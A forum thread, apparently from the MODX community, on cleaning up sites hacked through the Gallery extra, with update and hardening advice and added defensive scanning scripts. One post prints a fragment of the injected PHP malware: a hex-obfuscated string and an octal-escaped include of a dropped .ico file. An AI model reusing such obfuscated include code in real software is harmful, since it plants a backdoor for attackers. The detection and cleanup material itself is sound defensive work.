    • 52946
    • 2 Posts
    Site was not running updated version of MODX and was hacked. Site hosted at Godaddy, they have attempted 3 times to clean the malware but it persists. Have upgraded the site to MODX 2.6.5 and removed malware. Currently site will not load either front end or backend.
    www.grassynarrows.com. Does anyone have any suggestions where to start.

    [ed. note: prudolph last edited this post 5 years, 9 months ago.]
      • 44064
      • 185 Posts
      Hi @prudolph,

      they have attempted 3 times to clean the malware but it persists
      Do you mean it was deleted but returned again and again? I believe so as I see that too.

      Does anyone have any suggestions where to start.
      There are two ways:
      1. Auto malware search using various tools (like the hosting's Ai-bolit or others; you can even download all files and search locally with an anti-virus)
      2. Manual search if you know what and where to check (e.g. over the last few days I've updated about 20-30 websites, so I know where to check)

      After that MODX 2.6.5 update + Gallery update up to 1.7.1 (if used).

      This is the required minimum. There are stronger methods (first of all please read this, e.g. https://docs.modx.com/revolution/2.x/administering-your-site/security/hardening-modx-revolution) to prevent this in the future.
        Anton Tarasov
        MODX Developer

        Email: [email protected]
        Web: antontarasov.com
        • 3749
        • 24,544 Posts
        I would uninstall *and remove* the Gallery extra (if you have it) before doing anything else to prevent a new hack from occurring while you're upgrading.
          Did I help you? Buy me a beer
          Get my Book: MODX:The Official Guide
          MODX info for everyone: http://bobsguides.com/modx.html
          My MODX Extras
          Bob's Guides is now hosted at A2 MODX Hosting
          • 39827
          • 42 Posts
          Bob is correct. I have 30+ MODX installs; after the outbreak I updated them all to 2.6.5. Some (5) were already infected.
          When I started updating I missed the sentence that said "upgrade Gallery to 1.7.1".
          All websites where I forgot to update Gallery are hacked now.

          Update or remove Gallery is a MUST DO!
            • 44064
            • 185 Posts
            Quote from: BobRay at Jul 28, 2018, 08:16 PM
            I would uninstall *and remove* the Gallery extra (if you have it) before doing anything else to prevent a new hack from occurring while you're upgrading.
            That makes sense, I saw this too - if you aren't fast enough website can be affected via Gallery
              • 39827
              • 42 Posts
              In my practice, I have updated all sites to 2.6.5 and directly after install upgraded Gallery to 1.7.1.
              All sites remain clean so far.
              The (2) websites on which I skipped updating Gallery to 1.7.1 were hacked in 1-2 days because of Gallery (they were on 2.6.5).
                • 24374
                • 322 Posts
                I have websites that were hacked, then I cleaned them all up (updated to 2.6.5, updated Gallery to 1.7.1, deleted all files in the Gallery cache folder (where the hacker's php file was installed), deleted all the spurious index files, fixed MODX index files that were corrupted, tracked down and deleted all php files with gibberish names, and deleted the .ico file that was uploaded). Most sites are fine now, but SOME websites were reinfected the next day. Is there something else this hack does that I don't know about? Some other file or type of file that triggers reinfection? The php file does NOT reappear in the Gallery cache folder, so something else is going on.
                  • 3749
                  • 24,544 Posts
                  I'm not sure, but from what I've read, there are two hacks going on. One targets Gallery via the connectors directory (renaming it would protect you), and a second hack that targets a vulnerability in the core (moving the core above the web root and renaming it would protect you from that one).

                  Since you're already running 2.6.5, though, it's possible that there's an unfixed vulnerability in Gallery or the core. It's also possible that you missed one of the hacker's files -- it would be easy to do since there are thousands of files in a MODX install and some compromised files could have innocent-looking names.

                  One danger is that once you are hacked, the hacker could easily access the config.inc.php file, which would give away your DB credentials.
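The "you missed one of the hacker's files" problem from the post above is easiest to attack by comparing the downloaded site against a clean copy of the same release instead of reading thousands of files by hand. The script below is an added example, not code from the thread or from the MODX project: it hashes both trees and reports files that were added, modified or removed relative to the clean release. It assumes you have unpacked the matching release archive next to the site; the directory names, the skipped cache directory and the sample files in `demo()` are constructed for illustration.

```python
# Added example (not from the forum thread or the MODX project): compare a
# downloaded site tree against a clean unpacked release of the same version
# to find files an attacker added or changed. Paths below are assumptions.
import hashlib
import os
import tempfile


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def index_tree(root, skip_dirs=()):
    """Map relative path -> sha256 for every regular file under root.
    Directories listed in skip_dirs (relative, '/'-separated) are not
    descended into; the cache directory legitimately differs from a release."""
    index = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        rel_dir = "" if rel_dir == "." else rel_dir
        # prune in place so os.walk skips those subtrees entirely
        dirnames[:] = [d for d in dirnames
                       if os.path.join(rel_dir, d).replace(os.sep, "/") not in skip_dirs]
        for name in filenames:
            rel = os.path.join(rel_dir, name).replace(os.sep, "/")
            index[rel] = sha256_of(os.path.join(dirpath, name))
    return index


def diff_trees(reference_root, site_root, skip_dirs=("core/cache",)):
    """Return added / modified / missing file lists for site_root vs reference_root."""
    ref = index_tree(reference_root, skip_dirs)
    site = index_tree(site_root, skip_dirs)
    return {
        "added": sorted(p for p in site if p not in ref),
        "modified": sorted(p for p in site if p in ref and site[p] != ref[p]),
        "missing": sorted(p for p in ref if p not in site),
    }


def demo():
    """Build a constructed clean tree and a constructed 'hacked' site tree in a
    temporary directory and return diff_trees() over them. File names and
    contents are made up for the example."""
    base = tempfile.mkdtemp(prefix="modx-diff-")
    ref = os.path.join(base, "modx-2.6.5-pl")
    site = os.path.join(base, "site")
    clean = {
        "index.php": "<?php require 'config.core.php';\n",
        "connectors/index.php": "<?php // connector entry point\n",
        "core/model/modx/modx.class.php": "<?php class modX {}\n",
        "core/docs/changelog.txt": "MODX Revolution 2.6.5-pl\n",
    }
    infected = dict(clean)
    infected["index.php"] += "// constructed: unexpected line appended by the attacker\n"
    infected["assets/components/gallery/cache/a1b2c3.php"] = "<?php // constructed dropped file\n"
    infected["core/cache/logs/error.log"] = "runtime log, legitimately absent from a release\n"
    del infected["core/docs/changelog.txt"]
    for root, files in ((ref, clean), (site, infected)):
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write(body)
    return diff_trees(ref, site)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Anything under "added" or "modified" needs a look; note that extras installed through the package manager (Gallery included) will show up as added because they are not in the core release archive, so diff those against the extra's own package zip as well, and treat the site's own config.inc.php as expected to differ from the shipped template.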
                    • 52946
                    • 2 Posts
                    I have seemingly gotten the site back up with minimal damage. The hacks have not returned after 3 days. I did have Gallery installed but had updated it to 1.7.1 per the initial repair instructions. I finally removed it. I ended up renaming and changing the name on the database along with all the other "Hardening" suggestions provided above. Thank you all for your input, I appreciate it.
                      • 41144
                      • 15 Posts
                      If you're working on a Linux machine (or VM, of course) you can try to manually remove it.
                      Download the site and in command line:

                      egrep -Rln "/\*[A-Za-z0-9]{2,12}\*/" /path/to/the/site > __include.log
                      - searches for /*ABC123*/ (ABC123 is just an example)

                      egrep -Rl "(eval\(|eval/)" /path/to/the/site --exclude=\*.{js,css} > __eval.log
                      - Searches for command php eval in the files.

                      Then you have to manually edit the files.
                      Delete anything that looks unreadable like
                      $GLOBALS['of4721'] = Array();global $of4721;$of4721 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['d299'] = "\x6f\x64\x69\x4c\x55\x61\x65\x77\x4a\x49\x52\x35\x3d\x6d\x54\x63\x2e\x4b\x24\x5c\x41\x4f\x30\x23\x7a\x73\x5d\x44\x46\x7e\x3a\x58\x6e\x50\x39\x2a\x70\x78\x3b\x2d\x67\x56\x4d\x6c\x33\x38\x51\x3f\x31\x79\x48\x45\x43\x68\x5f\x57\x62\x34\x42\x29\x72\x66\x2f\x28\x21\x3c\x76\x71\x25\xa\x59\x2b\x60\x32\x22\x6a\x5a\x74\x53\x47\x36\x40\x3e\x20\xd\x2c\x5b\x75\x27\x7c\x7b\x9\x26\x4e\x5e\x6b\x37\x7d";$of4721[$of472



                      /*fb491*/
                      
                      @include "\057h\157m\145/\163t\162o\156y\057i\156t\145r\143i\164y\056p\154/\167w\167/\157b\162a\172y\057d\172i\141l\040p\162a\163o\167y\057M\141j\303³\167k\141 \0613\047/\0566\061f\143f\065f\141.\151c\157";
                      
                      /*fb491*/
                      


                      Update to 2.6.5 and Gallery to the newest, ideally on local machine. Delete site from the server and reupload.



                      [edit] you can also overwrite with the newest MODX before doing searches. There should be fewer files to edit.
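The two egrep searches above, plus the hex-escaped `$GLOBALS` string and the octal-escaped `@include`, are all simple patterns, so they can be combined into one scan that also decodes the escapes so you can read what the injected include actually points at. The script below is an added example, not code from the post or from MODX: the regexes, the file-extension lists and the sample files built in `demo()` are constructed for illustration, and every hit still needs the manual review the post describes, since a clean core can legitimately contain a stray `eval(`.

```python
# Added example (not from the forum thread or the MODX project): scan a
# downloaded site tree for the indicators discussed in the thread and decode
# PHP string escapes for triage. Patterns and thresholds are assumptions.
import os
import re
import tempfile

INDICATORS = {
    # /*fb491*/ style markers wrapping injected code (first egrep in the post)
    "comment_marker": re.compile(r"/\*[A-Za-z0-9]{2,12}\*/"),
    # eval( in anything that is not .js/.css (second egrep in the post)
    "php_eval": re.compile(r"\beval\s*\("),
    # six or more consecutive \xNN escapes, as in the $GLOBALS sample
    "hex_escaped_run": re.compile(r"(?:\\x[0-9A-Fa-f]{2}){6,}"),
    # include of a double-quoted path containing octal escapes, as in the sample
    "octal_include": re.compile(r'include\s+"[^"]*\\[0-7]{3}'),
    # PHP opening tag inside a file with a non-code extension (uploaded .ico etc.)
    "php_in_non_php": re.compile(r"<\?php"),
}
CODE_EXT = {".php", ".phtml", ".inc"}
SKIP_EXT = {".js", ".css"}


def decode_php_escapes(s):
    """Decode the \\xNN (1-2 hex digits) and \\NNN (1-3 octal digits) escapes
    PHP accepts in double-quoted strings, returning the readable text."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            m = re.match(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})", s[i:])
            if m:
                value = int(m.group(1), 16) if m.group(1) else int(m.group(2), 8)
                out.append(value & 0xFF)
                i += m.end()
                continue
        out.extend(s[i].encode("utf-8"))
        i += 1
    return out.decode("utf-8", errors="replace")


def scan_file(path):
    """Return the names of all indicators that fire on one file."""
    ext = os.path.splitext(path)[1].lower()
    if ext in SKIP_EXT:
        return []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            text = f.read()
    except OSError:
        return []
    hits = []
    for name, rx in INDICATORS.items():
        if name == "php_in_non_php" and ext in CODE_EXT:
            continue  # a PHP tag in a .php file is expected
        if rx.search(text):
            hits.append(name)
    return hits


def scan_tree(root):
    """Return {relative path: [indicator names]} for every file with a hit."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


def demo():
    """Write constructed sample files into a temporary tree and scan it."""
    root = tempfile.mkdtemp(prefix="modx-scan-")
    samples = {
        # constructed: marker-wrapped include of an octal-escaped path
        "index.php": "<?php\n/*fb491*/\n"
                     + r'@include "\057h\157m\145/\163i\164e/x.ico";'
                     + "\n/*fb491*/\nrequire 'config.core.php';\n",
        # constructed: PHP hidden in an uploaded .ico with a hex-escaped string
        "assets/images/x.ico": "<?php $GLOBALS['a'] = "
                               + r'"\x6f\x64\x69\x4c\x55\x61\x65";' + "\n",
        # constructed: eval in JavaScript is excluded, as in the post's egrep
        "assets/js/app.js": "eval(code);\n",
        # constructed: ordinary core file, no hits expected
        "core/model/modx/modx.class.php": "<?php class modX {}\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(body)
    return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(rel, hits)
    print(decode_php_escapes(r"\057h\157m\145/\163i\164e/x.ico"))
```

Run `scan_tree()` over the downloaded copy and feed any suspicious include string to `decode_php_escapes()`; the decoded path tells you which dropped file (here an `.ico`) the injected code loads, which is the file to remove along with the include.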